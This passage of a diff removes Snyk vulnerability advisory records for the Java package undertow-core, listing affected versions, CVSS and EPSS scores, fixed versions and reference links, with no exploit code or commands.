-      "SNYK-JAVA-IOUNDERTOW-12458577": {
-        "affected_hash_ranges": [],
-        "affected_hashes": [],
-        "affected_versions": [
-          "[0,2.3.20.Final)"
-        ],
-        "created_at": "2025-09-03T07:40:05.14503Z",
-        "credits": [
-          "Gal Bar Nahum",
-          "Anat Bremler-Barr",
-          "Yaniv Harel"
-        ],
-        "cvss_base_score": 8.7,
-        "cvss_sources": [
-          {
-            "assigner": "Snyk",
-            "base_score": 8.7,
-            "cvss_version": "4.0",
-            "modified_at": "2025-10-19T13:18:29.455323Z",
-            "severity": "high",
-            "type": "primary",
-            "vector": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N"
-          },
-          {
-            "assigner": "Snyk",
-            "base_score": 7.5,
-            "cvss_version": "3.1",
-            "modified_at": "2025-10-19T13:18:29.455323Z",
-            "severity": "high",
-            "type": "secondary",
-            "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
-          },
-          {
-            "assigner": "Red Hat",
-            "base_score": 7.5,
-            "cvss_version": "3.1",
-            "modified_at": "2025-09-01T14:30:22.382424Z",
-            "severity": "high",
-            "type": "secondary",
-            "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
-          }
-        ],
-        "cvss_vector": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N",
-        "disclosed_at": "2025-09-02T15:31:08Z",
-        "ecosystem": {
-          "language": "java",
-          "package_manager": "maven",
-          "type": "build"
-        },
-        "epss_details": {
-          "model_version": "v2025.03.14",
-          "percentile": "0.28242",
-          "probability": "0.00099"
-        },
-        "exploit_details": {
-          "maturity_levels": [
-            {
-              "format": "CVSSv3",
-              "level": "not defined",
-              "type": "secondary"
-            },
-            {
-              "format": "CVSSv4",
-              "level": "not defined",
-              "type": "primary"
-            }
-          ],
-          "sources": []
-        },
-        "id": "SNYK-JAVA-IOUNDERTOW-12458577",
-        "initially_fixed_in_versions": [
-          "2.3.20.Final"
-        ],
-        "is_fixable": true,
-        "is_malicious": false,
-        "is_social_media_trending": false,
-        "modified_at": "2025-10-19T13:18:29.455323Z",
-        "package_name": "io.undertow:undertow-core",
-        "package_version": "",
-        "published_at": "2025-09-03T09:55:37.588796Z",
-        "references": [
-          {
-            "title": "GitHub Commit",
-            "url": "https://github.com/undertow-io/undertow/commit/1d013b28395cffe5d2c8ba8f6fe767242bee0962"
-          },
-          {
-            "title": "GitHub Commit",
-            "url": "https://github.com/undertow-io/undertow/commit/39fcfbeb479acca9aaa94190c1877d632c5ac00e"
-          },
-          {
-            "title": "GitHub Commit",
-            "url": "https://github.com/undertow-io/undertow/commit/46108066c6b04bda57505290971023e5e83ac9ed"
-          },
-          {
-            "title": "GitHub Commit",
-            "url": "https://github.com/undertow-io/undertow/commit/afbd244df47f07c5816f029cc9e50ea99f159f01"
-          },
-          {
-            "title": "Red Hat Bugzilla Bug",
-            "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2392306"
-          },
-          {
-            "title": "Vulnerability Research",
-            "url": "https://www.imperva.com/blog/madeyoureset-turning-http-2-server-against-itself/"
-          }
-        ],
-        "severity": "high",
-        "source": "snyk_vuln"
-      },
-      "SNYK-JAVA-IOUNDERTOW-6567186": {
-        "affected_hash_ranges": [],
-        "affected_hashes": [],
-        "affected_versions": [
-          "[,2.2.32.Final)",
-          "[2.3.0.Alpha1,2.3.13.Final)"
-        ],
-        "created_at": "2024-04-05T14:06:11.114809Z",
-        "credits": [
-          "Unknown"
-        ],
-        "cvss_base_score": 7.5,
-        "cvss_sources": [
-          {
-            "assigner": "Snyk",
-            "base_score": 7.5,
-            "cvss_version": "3.1",
-            "modified_at": "2024-05-13T12:05:39.932206Z",
-            "severity": "high",
-            "type": "primary",
-            "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
-          },
-          {
-            "assigner": "NVD",
-            "base_score": 7.5,
-            "cvss_version": "3.1",
-            "modified_at": "2024-11-07T13:12:14.164525Z",
-            "severity": "high",
-            "type": "secondary",
-            "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
-          },
-          {
-            "assigner": "Red Hat",
-            "base_score": 7.5,
-            "cvss_version": "3.1",
-            "modified_at": "2024-04-05T13:32:48.961817Z",
-            "severity": "high",
-            "type": "secondary",
-            "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
-          }
-        ],
-        "cvss_vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
-        "disclosed_at": "2024-04-04T00:00:00Z",
-        "ecosystem": {
-          "language": "java",
-          "package_manager": "maven",
-          "type": "build"
-        },
-        "epss_details": {
-          "model_version": "v2025.03.14",
-          "percentile": "0.66569",
-          "probability": "0.00536"
-        },
-        "exploit_details": {
-          "maturity_levels": [
-            {
-              "format": "CVSSv3",
-              "level": "not defined",
-              "type": "secondary"
-            },
-            {
-              "format": "CVSSv4",
-              "level": "not defined",
-              "type": "primary"
-            }
-          ],
-          "sources": []
-        },
-        "id": "SNYK-JAVA-IOUNDERTOW-6567186",
-        "initially_fixed_in_versions": [
-          "2.2.32.Final",
-          "2.3.13.Final"
-        ],
-        "is_fixable": true,
-        "is_malicious": false,
-        "is_social_media_trending": false,
-        "modified_at": "2024-11-07T13:12:14.164525Z",
-        "package_name": "io.undertow:undertow-core",
-        "package_version": "",
-        "published_at": "2024-04-05T14:06:11.299727Z",
-        "references": [
-          {
-            "title": "GitHub Commit",
-            "url": "https://github.com/undertow-io/undertow/commit/0410f3c4d9b39b754a2203a29834cac51da11258"
-          },
-          {
-            "title": "Vulnerable Code",
-            "url": "https://github.com/undertow-io/undertow/blob/ddb4aeeb32f7ed58d715124acf1d464fc14b30dd/core/src/main/java/io/undertow/security/impl/FormAuthenticationMechanism.java%23L46"
-          }
-        ],
-        "severity": "high",
-        "source": "snyk_vuln"
-      },
-      "SNYK-JAVA-IOUNDERTOW-6669948": {
-        "affected_hash_ranges": [],
-        "affected_hashes": [],
-        "affected_versions": [
-          "[,2.2.31.Final)",
-          "[2.3.0.Alpha1,2.3.12.Final)"
-        ],
-        "created_at": "2024-04-21T07:43:26.561967Z",
-        "credits": [
-          "Unknown"
-        ],
-        "cvss_base_score": 7.5,
-        "cvss_sources": [
-          {
-            "assigner": "Snyk",
-            "base_score": 7.5,
-            "cvss_version": "3.1",
-            "modified_at": "2024-05-13T12:00:48.159973Z",
-            "severity": "high",
-            "type": "primary",
-            "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N"
-          },
-          {
-            "assigner": "NVD",
-            "base_score": 7.5,
-            "cvss_version": "3.1",
-            "modified_at": "2024-03-11T09:54:13.17045Z",
-            "severity": "high",
-            "type": "secondary",
-            "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
-          },
-          {
-            "assigner": "Red Hat",
-            "base_score": 7.5,
-            "cvss_version": "3.1",
-            "modified_at": "2025-06-26T13:36:53.809163Z",
-            "severity": "high",
-            "type": "secondary",
-            "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N"
-          }
-        ],
-        "cvss_vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
-        "disclosed_at": "2023-12-12T00:00:00Z",
-        "ecosystem": {
-          "language": "java",
-          "package_manager": "maven",
-          "type": "build"
-        },
-        "epss_details": {
-          "model_version": "v2025.03.14",
-          "percentile": "0.45416",
-          "probability": "0.00227"
-        },
-        "exploit_details": {
-          "maturity_levels": [
-            {
-              "format": "CVSSv3",
-              "level": "not defined",
-              "type": "secondary"
-            },
-            {
-              "format": "CVSSv4",
-              "level": "not defined",
-              "type": "primary"
-            }
-          ],
-          "sources": []
-        },
-        "id": "SNYK-JAVA-IOUNDERTOW-6669948",
-        "initially_fixed_in_versions": [
-          "2.2.31.Final",
-          "2.3.12.Final"
-        ],
-        "is_fixable": true,
-        "is_malicious": false,
-        "is_social_media_trending": false,
-        "modified_at": "2025-06-26T13:36:53.809163Z",
-        "package_name": "io.undertow:undertow-core",
-        "package_version": "",
-        "published_at": "2024-04-21T07:43:26.742123Z",
-        "references": [
-          {
-            "title": "GitHub Commit",
-            "url": "https://github.com/undertow-io/undertow/commit/b0732610112cb2066b5e43a47a11008edfacee02"
-          },
-          {
-            "title": "RedHat Bugzilla Bug",
-            "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2242099"
-          }
-        ],
-        "severity": "high",
-        "source": "snyk_vuln"
-      },
-      "SNYK-JAVA-IOUNDERTOW-7300152": {
-        "affected_hash_ranges": [],
-        "affected_hashes": [],
-        "affected_versions": [
-          "[,2.2.33.Final)",
-          "[2.3.0.Final,2.3.14.Final)"
-        ],
-        "created_at": "2024-06-21T06:28:17.382174Z",
-        "credits": [
-          "Unknown"
-        ],
-        "cvss_base_score": 8.7,
-        "cvss_sources": [
-          {
-            "assigner": "Snyk",
-            "base_score": 8.7,
-            "cvss_version": "4.0",
-            "modified_at": "2025-09-08T14:02:13.130291Z",
-            "severity": "high",
-            "type": "primary",
-            "vector": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N"
-          },
-          {
-            "assigner": "Snyk",
-            "base_score": 7.5,
-            "cvss_version": "3.1",
-            "modified_at": "2025-09-08T14:02:13.130291Z",
-            "severity": "high",
-            "type": "secondary",
-            "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
-          }
-        ],
-        "cvss_vector": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N",
-        "disclosed_at": "2024-06-20T15:31:19Z",
-        "ecosystem": {
-          "language": "java",
-          "package_manager": "maven",
-          "type": "build"
-        },
-        "epss_details": {
-          "model_version": "v2025.03.14",
-          "percentile": "0.83174",
-          "probability": "0.02024"
-        },
-        "exploit_details": {
-          "maturity_levels": [
-            {
-              "format": "CVSSv3",
-              "level": "not defined",
-              "type": "secondary"
-            },
-            {
-              "format": "CVSSv4",
-              "level": "not defined",
-              "type": "primary"
-            }
-          ],
-          "sources": []
-        },
-        "id": "SNYK-JAVA-IOUNDERTOW-7300152",
-        "initially_fixed_in_versions": [
-          "2.2.33.Final",
-          "2.3.14.Final"
-        ],
-        "is_fixable": true,
-        "is_malicious": false,
-        "is_social_media_trending": false,
-        "modified_at": "2025-09-08T14:02:13.130291Z",
-        "package_name": "io.undertow:undertow-core",
-        "package_version": "",
-        "published_at": "2024-06-21T07:17:01.928932Z",
-        "references": [
-          {
-            "title": "GitHub Commit",
-            "url": "https://github.com/undertow-io/undertow/commit/90f202ada89b6d9883beed0f1fe10c99d470d9a8"
-          },
-          {
-            "title": "Red Hat Bugzilla Bug",
-            "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2293069"
-          }
-        ],
-        "severity": "high",
-        "source": "snyk_vuln"
-      },
-      "SNYK-JAVA-IOUNDERTOW-7300153": {
-        "affected_hash_ranges": [],
-        "affected_hashes": [],
-        "affected_versions": [
-          "[,2.2.33.Final)",
-          "[2.3.0.Final,2.3.14.Final)"
-        ],
-        "created_at": "2024-06-21T06:34:44.64394Z",
-        "credits": [
-          "Bartek Nowotarski"
-        ],
-        "cvss_base_score": 8.7,
-        "cvss_sources": [
-          {
-            "assigner": "Snyk",
-            "base_score": 8.7,
-            "cvss_version": "4.0",
-            "modified_at": "2024-11-10T17:07:50.376187Z",
-            "severity": "high",
-            "type": "primary",
-            "vector": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:P"
-          },
-          {
-            "assigner": "Snyk",
-            "base_score": 7.5,
-            "cvss_version": "3.1",
-            "modified_at": "2024-11-10T17:07:50.376187Z",
-            "severity": "high",
-            "type": "secondary",
-            "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H/E:P"
-          },
-          {
-            "assigner": "NVD",
-            "base_score": 7.5,
-            "cvss_version": "3.1",
-            "modified_at": "2024-06-07T01:11:20.186304Z",
-            "severity": "high",
-            "type": "secondary",
-            "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
-          },
-          {
-            "assigner": "Red Hat",
-            "base_score": 7.5,
-            "cvss_version": "3.1",
-            "modified_at": "2024-04-04T13:31:53.396581Z",
-            "severity": "high",
-            "type": "secondary",
-            "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
-          },
-          {
-            "assigner": "SUSE",
-            "base_score": 7.5,
-            "cvss_version": "3.1",
-            "modified_at": "2024-05-28T11:02:47.420228Z",
-            "severity": "high",
-            "type": "secondary",
-            "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
-          }
-        ],
-        "cvss_vector": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:P",
-        "disclosed_at": "2024-04-03T00:00:00Z",
-        "ecosystem": {
-          "language": "java",
-          "package_manager": "maven",
-          "type": "build"
-        },
-        "epss_details": {
-          "model_version": "v2025.03.14",
-          "percentile": "0.99545",
-          "probability": "0.89957"
-        },
-        "exploit_details": {
-          "maturity_levels": [
-            {
-              "format": "CVSSv3",
-              "level": "proof of concept",
-              "type": "secondary"
-            },
-            {
-              "format": "CVSSv4",
-              "level": "proof of concept",
-              "type": "primary"
-            }
-          ],
-          "sources": [
-            "PoC in GitHub",
-            "Snyk"
-          ]
-        },
-        "id": "SNYK-JAVA-IOUNDERTOW-7300153",
-        "initially_fixed_in_versions": [
-          "2.2.33.Final",
-          "2.3.14.Final"
-        ],
-        "is_fixable": true,
-        "is_malicious": false,
-        "is_social_media_trending": false,
-        "modified_at": "2025-10-08T05:20:08.750776Z",
-        "package_name": "io.undertow:undertow-core",
-        "package_version": "",
-        "published_at": "2024-06-21T06:34:44.890198Z",
-        "references": [
-          {
-            "title": "Apache Advisory",
-            "url": "https://httpd.apache.org/security/vulnerabilities_24.html"
-          },
-          {
-            "title": "Github Commit",
-            "url": "https://github.com/undertow-io/undertow/commit/c27c1e40c945c11f13b210fd72fadf0ae641f3d0"
-          },
-          {
-            "title": "GitHub Commit",
-            "url": "https://github.com/undertow-io/undertow/commit/296636d341dd8c9ff60dae017500c61f051bc42a"
-          },
-          {
-            "title": "GitHub Commit",
-            "url": "https://github.com/undertow-io/undertow/commit/d798de663e834450acec1041e44bae938a7b45b6"
-          },
-          {
-            "title": "PoC",
-            "url": "https://github.com/lockness-Ko/CVE-2024-27316"
-          },
-          {
-            "title": "RedHat Bugzilla Bug",
-            "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2268277"
-          },
-          {
-            "title": "Security Notes",
-            "url": "https://www.kb.cert.org/vuls/id/421644"
-          }
-        ],
-        "severity": "high",
-        "source": "snyk_vuln"
-      },
-      "SNYK-JAVA-IOUNDERTOW-7361775": {
-        "affected_hash_ranges": [],
-        "affected_hashes": [],
-        "affected_versions": [
-          "[,2.2.33.Final)",
-          "[2.3.0.Final,2.3.12.Final)"
-        ],
-        "created_at": "2024-06-24T08:51:30.470325Z",
-        "credits": [
-          "Unknown"
-        ],
-        "cvss_base_score": 5.3,
-        "cvss_sources": [
-          {
-            "assigner": "Snyk",
-            "base_score": 5.3,
-            "cvss_version": "3.1",
-            "modified_at": "2024-06-24T08:51:30.64614Z",
-            "severity": "medium",
-            "type": "primary",
-            "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N"
-          },
-          {
-            "assigner": "NVD",
-            "base_score": 5.3,
-            "cvss_version": "3.1",
-            "modified_at": "2024-03-11T09:52:49.711513Z",
-            "severity": "medium",
-            "type": "secondary",
-            "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N"
-          },
-          {
-            "assigner": "Red Hat",
-            "base_score": 5.3,
-            "cvss_version": "3.1",
-            "modified_at": "2024-05-09T13:34:57.715909Z",
-            "severity": "medium",
-            "type": "secondary",
-            "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N"
-          }
-        ],
-        "cvss_vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
-        "disclosed_at": "2024-01-18T00:00:00Z",
-        "ecosystem": {
-          "language": "java",
-          "package_manager": "maven",
-          "type": "build"
-        },
-        "epss_details": {
-          "model_version": "v2025.03.14",
-          "percentile": "0.91530",
-          "probability": "0.07724"
-        },
-        "exploit_details": {
-          "maturity_levels": [
-            {
-              "format": "CVSSv3",
-              "level": "not defined",
-              "type": "secondary"
-            },
-            {
-              "format": "CVSSv4",
-              "level": "not defined",
-              "type": "primary"
-            }
-          ],
-          "sources": []
-        },
-        "id": "SNYK-JAVA-IOUNDERTOW-7361775",
-        "initially_fixed_in_versions": [
-          "2.2.33.Final",
-          "2.3.12.Final"
-        ],
-        "is_fixable": true,
-        "is_malicious": false,
-        "is_social_media_trending": false,
-        "modified_at": "2024-06-24T08:51:30.64614Z",
-        "package_name": "io.undertow:undertow-core",
-        "package_version": "",
-        "published_at": "2024-06-24T08:51:30.645852Z",
-        "references": [
-          {
-            "title": "GitHub Commit",
-            "url": "https://github.com/undertow-io/undertow/commit/9b7c5037eb3eff021366233a0af6b82ec83c7d94"
-          },
-          {
-            "title": "RedHat Bugzilla Bug",
-            "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2259475"
-          }
-        ],
-        "severity": "medium",
-        "source": "snyk_vuln"
-      },
-      "SNYK-JAVA-IOUNDERTOW-7433721": {
-        "affected_hash_ranges": [],
-        "affected_hashes": [],
-        "affected_versions": [
-          "[,2.2.37.Final)",
-          "[2.3.0.Alpha1,2.3.18.Final)"
-        ],
-        "created_at": "2024-07-10T07:43:42.505449Z",
-        "credits": [
-          "Unknown"
-        ],
-        "cvss_base_score": 2.3,
-        "cvss_sources": [
-          {
-            "assigner": "Snyk",
-            "base_score": 2.3,
-            "cvss_version": "4.0",
-            "modified_at": "2024-10-20T16:06:34.85722Z",
-            "severity": "low",
-            "type": "primary",
-            "vector": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N"
-          },
-          {
-            "assigner": "Snyk",
-            "base_score": 3.1,
-            "cvss_version": "3.1",
-            "modified_at": "2024-10-20T16:06:34.85722Z",
-            "severity": "low",
-            "type": "secondary",
-            "vector": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:L"
-          },
-          {
-            "assigner": "Red Hat",
-            "base_score": 5.3,
-            "cvss_version": "3.1",
-            "modified_at": "2024-08-09T13:34:05.805132Z",
-            "severity": "medium",
-            "type": "secondary",
-            "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L"
-          }
-        ],
-        "cvss_vector": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N",
-        "disclosed_at": "2024-07-09T00:31:40Z",
-        "ecosystem": {
-          "language": "java",
-          "package_manager": "maven",
-          "type": "build"
-        },
-        "epss_details": {
-          "model_version": "v2025.03.14",
-          "percentile": "0.90687",
-          "probability": "0.06505"
-        },
-        "exploit_details": {
-          "maturity_levels": [
-            {
-              "format": "CVSSv3",
-              "level": "not defined",
-              "type": "secondary"
-            },
-            {
-              "format": "CVSSv4",
-              "level": "not defined",
-              "type": "primary"
-            }
-          ],
-          "sources": []
-        },
-        "id": "SNYK-JAVA-IOUNDERTOW-7433721",
-        "initially_fixed_in_versions": [
-          "2.2.37.Final",
-          "2.3.18.Final"
-        ],
-        "is_fixable": true,
-        "is_malicious": false,
-        "is_social_media_trending": false,
-        "modified_at": "2024-10-20T16:06:34.85722Z",
-        "package_name": "io.undertow:undertow-core",
-        "package_version": "",
-        "published_at": "2024-07-10T14:39:24.891304Z",
-        "references": [
-          {
-            "title": "GitHub Commit",
-            "url": "https://github.com/undertow-io/undertow/commit/6b8e79c167ed57444ef6ea480316a5d64faf080b"
-          },
-          {
-            "title": "Red Hat Bugzilla Bug",
-            "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2274437"
-          },
-          {
-            "title": "Red Hat Security Advisory",
-            "url": "https://access.redhat.com/errata/RHSA-2024:4392"
-          },
-          {
-            "title": "Vulnerable Code",
-            "url": "https://github.com/undertow-io/undertow/blob/2.3.14.Final/core/src/main/java/io/undertow/Handlers.java%23L562"
-          }
-        ],
-        "severity": "low",
-        "source": "snyk_vuln"
-      },
-      "SNYK-JAVA-IOUNDERTOW-7707751": {
-        "affected_hash_ranges": [],
-        "affected_hashes": [],
-        "affected_versions": [
-          "[,2.2.36.Final)",
-          "[2.3.0.Alpha1,2.3.17.Final)"
-        ],
-        "created_at": "2024-08-18T13:26:45.492443Z",
-        "credits": [
-          "Unknown"
-        ],
-        "cvss_base_score": 6.9,
-        "cvss_sources": [
-          {
-            "assigner": "Snyk",
-            "base_score": 6.9,
-            "cvss_version": "4.0",
-            "modified_at": "2024-10-20T16:08:50.546726Z",
-            "severity": "medium",
-            "type": "primary",
-            "vector": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:L/SC:N/SI:N/SA:N"
-          },
-          {
-            "assigner": "Snyk",
-            "base_score": 6.5,
-            "cvss_version": "3.1",
-            "modified_at": "2024-10-20T16:08:50.546726Z",
-            "severity": "medium",
-            "type": "secondary",
-            "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:L"
-          },
-          {
-            "assigner": "NVD",
-            "base_score": 7.5,
-            "cvss_version": "3.1",
-            "modified_at": "2024-08-24T01:12:26.277956Z",
-            "severity": "high",
-            "type": "secondary",
-            "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
-          },
-          {
-            "assigner": "Red Hat",
-            "base_score": 7.5,
-            "cvss_version": "3.1",
-            "modified_at": "2024-10-01T13:39:24.896864Z",
-            "severity": "high",
-            "type": "secondary",
-            "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
-          }
-        ],
-        "cvss_vector": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:L/SC:N/SI:N/SA:N",
-        "disclosed_at": "2024-08-07T00:00:00Z",
-        "ecosystem": {
-          "language": "java",
-          "package_manager": "maven",
-          "type": "build"
-        },
-        "epss_details": {
-          "model_version": "v2025.03.14",
-          "percentile": "0.90559",
-          "probability": "0.06348"
-        },
-        "exploit_details": {
-          "maturity_levels": [
-            {
-              "format": "CVSSv3",
-              "level": "not defined",
-              "type": "secondary"
-            },
-            {
-              "format": "CVSSv4",
-              "level": "not defined",
-              "type": "primary"
-            }
-          ],
-          "sources": []
-        },
-        "id": "SNYK-JAVA-IOUNDERTOW-7707751",
-        "initially_fixed_in_versions": [
-          "2.2.36.Final",
-          "2.3.17.Final"
-        ],
-        "is_fixable": true,
-        "is_malicious": false,
-        "is_social_media_trending": false,
-        "modified_at": "2024-10-20T16:08:50.546726Z",
-        "package_name": "io.undertow:undertow-core",
-        "package_version": "",
-        "published_at": "2024-08-18T13:44:23.906447Z",
-        "references": [
-          {
-            "title": "GitHub Commit",
-            "url": "https://github.com/undertow-io/undertow/commit/ce5182c37376982ef0abee34fce0d8c0aab0fab8"
-          },
-          {
-            "title": "GitHub Commit",
-            "url": "https://github.com/undertow-io/undertow/commit/d0c82ba6d13fb03da83174641a37fe15990607a7"
-          },
-          {
-            "title": "Red Hat Bugzilla Bug",
-            "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2305290"
-          }
-        ],
-        "severity": "medium",
-        "source": "snyk_vuln"
-      },
-      "SNYK-JAVA-IOUNDERTOW-7984545": {
-        "affected_hash_ranges": [],
-        "affected_hashes": [],
-        "affected_versions": [
-          "[,2.2.31.Final)",
-          "[2.3.0.Final,2.3.12.Final)"
-        ],
-        "created_at": "2024-09-17T09:28:31.545675Z",
-        "credits": [
-          "Flavia Rainone"
-        ],
-        "cvss_base_score": 8.7,
-        "cvss_sources": [
-          {
-            "assigner": "Snyk",
-            "base_score": 8.7,
-            "cvss_version": "4.0",
-            "modified_at": "2024-09-17T11:40:18.064977Z",
-            "severity": "high",
-            "type": "primary",
-            "vector": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N"
-          },
-          {
-            "assigner": "Snyk",
-            "base_score": 7.5,
-            "cvss_version": "3.1",
-            "modified_at": "2024-09-17T11:40:18.064977Z",
-            "severity": "high",
-            "type": "secondary",
-            "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
-          },
-          {
-            "assigner": "Red Hat",
-            "base_score": 7.5,
-            "cvss_version": "3.1",
-            "modified_at": "2024-04-05T13:32:49.118445Z",
-            "severity": "high",
-            "type": "secondary",
-            "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
-          }
-        ],
-        "cvss_vector": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N",
-        "disclosed_at": "2024-02-20T00:30:36Z",
-        "ecosystem": {
-          "language": "java",
-          "package_manager": "maven",
-          "type": "build"
-        },
-        "epss_details": {
-          "model_version": "v2025.03.14",
-          "percentile": "0.91878",
-          "probability": "0.08330"
-        },
-        "exploit_details": {
-          "maturity_levels": [
-            {
-              "format": "CVSSv3",
-              "level": "not defined",
-              "type": "secondary"
-            },
-            {
-              "format": "CVSSv4",
-              "level": "not defined",
-              "type": "primary"
-            }
-          ],
-          "sources": []
-        },
-        "id": "SNYK-JAVA-IOUNDERTOW-7984545",
-        "initially_fixed_in_versions": [
-          "2.2.31.Final",
-          "2.3.12.Final"
-        ],
-        "is_fixable": true,
-        "is_malicious": false,
-        "is_social_media_trending": false,
-        "modified_at": "2024-09-17T11:40:18.064977Z",
-        "package_name": "io.undertow:undertow-core",
-        "package_version": "",
-        "published_at": "2024-09-17T11:40:18.05624Z",
-        "references": [
-          {
-            "title": "GitHub Commit",
-            "url": "https://github.com/undertow-io/undertow/commit/3cdb104e225f34547ce9fd6eb8799eb68e040f19"
-          },
-          {
-            "title": "GitHub Commit",
-            "url": "https://github.com/undertow-io/undertow/commit/7d388c5aae9b82afb63f24e3b6a2044838dfb4de"
-          },
-          {
-            "title": "Red Hat Bugzilla Bug",
-            "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2264928"
-          },
-          {
-            "title": "Red Hat Issues",
-            "url": "https://issues.redhat.com/browse/UNDERTOW-2336"
-          }
-        ],
-        "severity": "high",
-        "source": "snyk_vuln"
-      },
-      "SNYK-JAVA-IOUNDERTOW-8383402": {
-        "affected_hash_ranges": [],
-        "affected_hashes": [],
-        "affected_versions": [
-          "[,2.2.30.Final)",
-          "[2.3.0.Alpha1,2.3.11.Final)"
-        ],
-        "created_at": "2024-11-18T19:58:47.442855Z",
-        "credits": [
-          "Unknown"
-        ],
-        "cvss_base_score": 9.1,
-        "cvss_sources": [
-          {
-            "assigner": "Snyk",
-            "base_score": 9.1,
-            "cvss_version": "4.0",
-            "modified_at": "2024-11-18T19:58:47.813113Z",
-            "severity": "critical",
-            "type": "primary",
-            "vector": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N"
-          },
-          {
-            "assigner": "Snyk",
-            "base_score": 7.4,
-            "cvss_version": "3.1",
-            "modified_at": "2024-11-18T19:58:47.813113Z",
-            "severity": "high",
-            "type": "secondary",
-            "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N"
-          },
-          {
-            "assigner": "NVD",
-            "base_score": 7.4,
-            "cvss_version": "3.1",
-            "modified_at": "2024-11-17T13:12:36.922431Z",
-            "severity": "high",
-            "type": "secondary",
-            "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N"
-          },
-          {
-            "assigner": "Red Hat",
-            "base_score": 7.4,
-            "cvss_version": "3.1",
-            "modified_at": "2024-04-05T13:32:49.013244Z",
-            "severity": "high",
-            "type": "secondary",
-            "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N"
-          }
-        ],
-        "cvss_vector": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N",
-        "disclosed_at": "2024-11-17T10:47:41.209Z",
-        "ecosystem": {
-          "language": "java",
-          "package_manager": "maven",
-          "type": "build"
-        },
-        "epss_details": {
-          "model_version": "v2025.03.14",
-          "percentile": "0.87505",
-          "probability": "0.03740"
-        },
-        "exploit_details": {
-          "maturity_levels": [
-            {
-              "format": "CVSSv3",
-              "level": "not defined",
-              "type": "secondary"
-            },
-            {
-              "format": "CVSSv4",
-              "level": "not defined",
-              "type": "primary"
-            }
-          ],
-          "sources": []
-        },
-        "id": "SNYK-JAVA-IOUNDERTOW-8383402",
-        "initially_fixed_in_versions": [
